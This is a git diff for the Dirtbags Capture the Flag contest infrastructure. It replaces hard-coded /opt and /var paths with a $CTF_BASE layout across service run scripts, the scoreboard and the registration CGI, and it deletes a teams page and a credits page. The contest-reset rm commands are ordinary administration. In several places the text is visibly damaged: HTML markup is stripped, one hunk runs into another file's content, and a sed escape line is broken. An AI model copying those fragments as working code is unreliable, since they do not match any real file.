a/packages/mcp/bin/new-contest b/packages/mcp/bin/new-contest index 02e7e1f..261bbf4 100755 --- a/packages/mcp/bin/new-contest +++ b/packages/mcp/bin/new-contest @@ -14,16 +14,14 @@ sv d pointsd sv d puzzled sv d tanksd -rm -f /var/lib/ctf/tokens.db -rm -f /var/lib/ctf/points.log -rm -f /var/www/scoreboard.html -rm -f /var/lib/ctf/puzzles.db -rm -rf /var/lib/ctf/points.new -rm -rf /var/lib/ctf/points.tmp -rm -rf /var/lib/ctf/tanks -rm -rf /var/lib/ctf/teams - -backup-pass +rm -f $CTF_BASE/state/tokens.db +rm -f $CTF_BASE/state/points.log +rm -f $CTF_BASE/www/scoreboard.html +rm -f $CTF_BASE/state/puzzles.db +rm -rf $CTF_BASE/state/points.new +rm -rf $CTF_BASE/state/points.tmp +rm -rf $CTF_BASE/state/tanks +rm -rf $CTF_BASE/state/teams sv u tokend sv u pointsd diff --git a/packages/mcp/bin/run-ctf b/packages/mcp/bin/run-ctf index 0d7e4ff..f134ec8 100755 --- a/packages/mcp/bin/run-ctf +++ b/packages/mcp/bin/run-ctf @@ -3,13 +3,15 @@ # First argument is seconds between running everything period=${1:-60} -BIN=${CTF_BASE:-/opt/mcp}/bin -WWW=${CTF_BASE:-/var}/www -STATE=${CTF_BASE:-/var/lib/ctf} +packages=$CTF_BASE/packages +state=$CTF_BASE/state +www=$CTF_BASE/www -NEWPOINTS=$STATE/points.new -POINTS=$STATE/points.log -SCOREBOARD=$WWW/scoreboard.html +BIN=$packages/mcp/bin + +NEWPOINTS=$state/points.new +POINTS=$state/points.log +SCOREBOARD=$www/scoreboard.html if ! [ -f $SCOREBOARD ]; then $BIN/scoreboard < $POINTS > $SCOREBOARD diff --git a/packages/mcp/bin/scoreboard b/packages/mcp/bin/scoreboard index cd6c21e..6440c7a 100755 --- a/packages/mcp/bin/scoreboard +++ b/packages/mcp/bin/scoreboard @@ -65,9 +65,6 @@ function output( t, c) { BEGIN { base = ENVIRON["CTF_BASE"] - if (! base) { - base = "/var/lib/ctf" - } # Only display two decimal places CONVFMT = "%.2f" @@ -108,13 +105,13 @@ END { for (team in teams) { # Busybox awk segfaults if you try to close a file that didn't # exist. We work around it by calling cat. - cmd = sprintf("cat %s/teams/colors/%s", base, team) + cmd = sprintf("cat %s/state/teams/colors/%s", base, team) color = "444444"; cmd | getline color colors_by_team[team] = color close(cmd) - cmd = sprintf("cat %s/teams/names/%s", base, team) + cmd = sprintf("cat %s/state/teams/names/%s", base, team) name = "Phantoms" cmd | getline name names_by_team[team] = name diff --git a/packages/mcp/bin/teams.sh b/packages/mcp/bin/teams.sh deleted file mode 100755 index 86bd6e3..0000000 --- a/packages/mcp/bin/teams.sh +++ /dev/null @@ -1,38 +0,0 @@ -#! /bin/sh - -cd ${CTF_BASE:-/var/lib/ctf}/teams/names - -escape () { - sed 's/&/\&/g;s//\>/g' -} - -title='Teams' - -cat < - - - $title - - - -

$title

-EOF - -echo "" -echo "" -for i in *; do - echo "" -done -echo "
TeamID
" - escape < $i - echo "$i
" - -cat < - Team names are only used on this page and the scoreboard. - Use your team ID to claim points. -

- - -EOF diff --git a/packages/mcp/service/httpd/run b/packages/mcp/service/httpd/run index b0462b8..142b1de 100755 --- a/packages/mcp/service/httpd/run +++ b/packages/mcp/service/httpd/run @@ -7,16 +7,15 @@ IP=$(dbip -a) hostname mcp # Link in puzzles and web pages -install -d /var/www -for d in /opt/*; do - w=/var/www/$(basename $d) +for d in /packages/*; do + w=$CTF_BASE/www/$(basename $d) if [ -d $d/puzzles ] && ! [ -d $w ]; then ln -sf $d/puzzles $w fi if [ -d $d/www ]; then - ln -sf $d/www/* /var/www/ + ln -sf $d/www/* $CTF_BASE/www/ fi done cd /var/www -exec tcpsvd -u ctf ${IP%/*} 80 /opt/mcp/bin/eris -c. +exec tcpsvd -u ctf ${IP%/*} 80 $CTF_BASE/packages/mcp/bin/eris -c. diff --git a/packages/mcp/www/register.cgi b/packages/mcp/www/register.cgi index e71c445..1330bb7 100755 --- a/packages/mcp/www/register.cgi +++ b/packages/mcp/www/register.cgi @@ -16,13 +16,13 @@ Content-type: text/html

Team Registration

EOF -if [ ! -w /var/www ] || [ ! -w /var/lib/ctf/teams ]; then +if [ ! -w $CTF_BASE/www ] || [ ! -w $CTF_BASE/state/teams ]; then echo "

It looks like the server isn't set up for self-registrations." echo "Go talk to someone at the head table to register your team.

" else echo "

Team name: $team

" echo -n "
"
-    if /opt/mcp/bin/addteam "$team"; then
+    if $CTF_BASE/mcp/bin/addteam "$team"; then
         echo "

Write this hash down. You will use it to claim points.

" else echo "Oops, something broke. Better call Neale." diff --git a/packages/multicaster/service/multicaster/run b/packages/multicaster/service/multicaster/run index 9356c83..0ed554b 100755 --- a/packages/multicaster/service/multicaster/run +++ b/packages/multicaster/service/multicaster/run @@ -4,4 +4,4 @@ exec 2>&1 IP=$(dbip -a) -exec setuidgid ctf /opt/multicaster/bin/multicaster ff15::62c 1580 $CTF_BASE/state/news.html +fi +ln -sf $CTF_BASE/state/news.html $CTF_BASE/www + +cd $CTF_BASE/www +exec tcpsvd -u nobody ${IP%/*} 80 $CTF_BASE/packages/p2/bin/eris -c. diff --git a/packages/p2/www/credits.html b/packages/p2/www/credits.html deleted file mode 100644 index 280f2ff..0000000 --- a/packages/p2/www/credits.html +++ /dev/null @@ -1,51 +0,0 @@ - - - - The Credits - - - -

Credits

- -

Dirtbags Capture the Flag is brought to you by:

- -
    -
  • The number C
  • -
  • The letters ع and ֆ
  • -
- -

And by:

-
    -
  • Alex Brugh
  • -
  • Paul Ferrell
  • -
  • Jeremy Scott
  • -
  • Danny Quist
  • -
  • Adam Glasgall
  • -
  • Curtis Hash
  • -
  • Aaron McPhall
  • -
  • Patrick Avery
  • -
  • Erin Ochoa
  • -
  • William Phillips
  • -
  • Should your name be here? Please remind me!
  • -
- -

Parts of this contest were inspired by:

-
    -
  • DC949
  • -
  • Tube Warriors
  • -
  • Bad people from around the world (screw you guys, seriously)
  • -
- -

Lastly, this contest would not exist were it not for hundreds of - thousands of lines of code from free software authors around the - world, including:

-
    -
  • Busybox and Buildroot
  • -
  • the Linux kernel
  • -
  • dnsmasq
  • -
  • fnord httpd
  • -
  • ngircd
  • -
  • lua
  • -
- - diff --git a/packages/p2/www/index.html b/packages/p2/www/index.html index 5bc4a7b..5537055 100644 --- a/packages/p2/www/index.html +++ b/packages/p2/www/index.html @@ -15,6 +15,9 @@
  • Puzzles
  • +
  • + News -- updated when things go wrong. +
  • About scoring
  • @@ -33,10 +36,5 @@ When you have solved a puzzle, enter the answer at the console to change your ranking on the scoreboard.

    - -

    - This event would not be possible without the help of many people. - Thank you, people. -

    diff --git a/packages/p2/www/news.html b/packages/p2/www/news.html new file mode 100644 index 0000000..442fe21 --- /dev/null +++ b/packages/p2/www/news.html @@ -0,0 +1,17 @@ + + + + News + + + +

    News

    + +

    Usually updated when something goes wrong.

    + +
      + +
    • Event begins
    • +
    + + diff --git a/packages/p2client/service/p2client/run b/packages/p2client/service/p2client/run index a7e7c3c..c93a578 100755 --- a/packages/p2client/service/p2client/run +++ b/packages/p2client/service/p2client/run @@ -10,7 +10,7 @@ if ! sv s tty1 | grep down; then fi # Cool font -setfont -C /dev/tty1 /opt/p2client/lite-16.fnt +setfont -C /dev/tty1 $CTF_BASE/packages/p2client/lite-16.fnt if ! grep -q debug /proc/cmdline; then @@ -25,7 +25,7 @@ if ! grep -q debug /proc/cmdline; then setterm -blank 0 -powersave off -powerdown 0 # Make this like a VT52; including disabling ctrl-alt-del - loadkmap < /opt/p2client/dumbterm.kmap + loadkmap < $CTF_BASE/packages/p2client/dumbterm.kmap # Disable console logging echo 1 4 1 4 > /proc/sys/kernel/printk diff --git a/packages/playfair/service/playfair/run b/packages/playfair/service/playfair/run index e7a9470..41bf390 100755 --- a/packages/playfair/service/playfair/run +++ b/packages/playfair/service/playfair/run @@ -5,5 +5,5 @@ exec 2>&1 IP=$(dbip -a) ip addr add $IP dev eth0 || true -exec tcpsvd -u nobody ${IP%/*} 1013 /opt/playfair/bin/playfair +exec tcpsvd -u nobody ${IP%/*} 1013 $CTF_BASE/packages/playfair/bin/playfair diff --git a/packages/printf/service/printf/run-printf b/packages/printf/service/printf/run-printf index 49789b9..9563407 100755 --- a/packages/printf/service/printf/run-printf +++ b/packages/printf/service/printf/run-printf @@ -1,3 +1,3 @@ #! /bin/sh -exec chpst -u 9001 -/ /opt/printf/bin ./printf 3 $teamhash else diff --git a/packages/router/service/radvd/run b/packages/router/service/radvd/run index 3ee78f1..02cecbf 100755 --- a/packages/router/service/radvd/run +++ b/packages/router/service/radvd/run @@ -2,4 +2,4 @@ exec 2>&1 -exec /opt/router/bin/radvd -C radvd.conf -d 1 -m stderr -p radvd.pid +exec $CTF_BASE/packages/router/bin/radvd -C radvd.conf -d 1 -m stderr -p radvd.pid diff --git a/packages/router/service/router/run b/packages/router/service/router/run index 0e33c6a..2b49e79 100755 --- a/packages/router/service/router/run +++ b/packages/router/service/router/run @@ -12,7 +12,7 @@ log () { echo "router: $@" > /dev/console } -if [ $(mount | grep -c /opt/) -gt 1 ]; then +if [ $(mount | grep -c /packages/) -gt 1 ]; then log "cannot run alongside other packages" > /dev/console exit 1 fi diff --git a/packages/tanks/html/designer.cgi b/packages/tanks/html/designer.cgi index 7a9800c..753b2e4 100755 --- a/packages/tanks/html/designer.cgi +++ b/packages/tanks/html/designer.cgi @@ -1,4 +1,4 @@ #! /bin/sh -BASE_PATH=/var/lib/ctf/tanks/players/; export BASE_PATH -exec /opt/tanks/bin/designer.cgi +BASE_PATH=$CTF_BASE/state/tanks/players/; export BASE_PATH +exec $CTF_BASE/packages/tanks/bin/designer.cgi diff --git a/packages/tanks/html/newest.html b/packages/tanks/html/newest.html new file mode 100644 index 0000000..a95fe78 --- /dev/null +++ b/packages/tanks/html/newest.html @@ -0,0 +1,30 @@ + + + + Tanks + + + + + +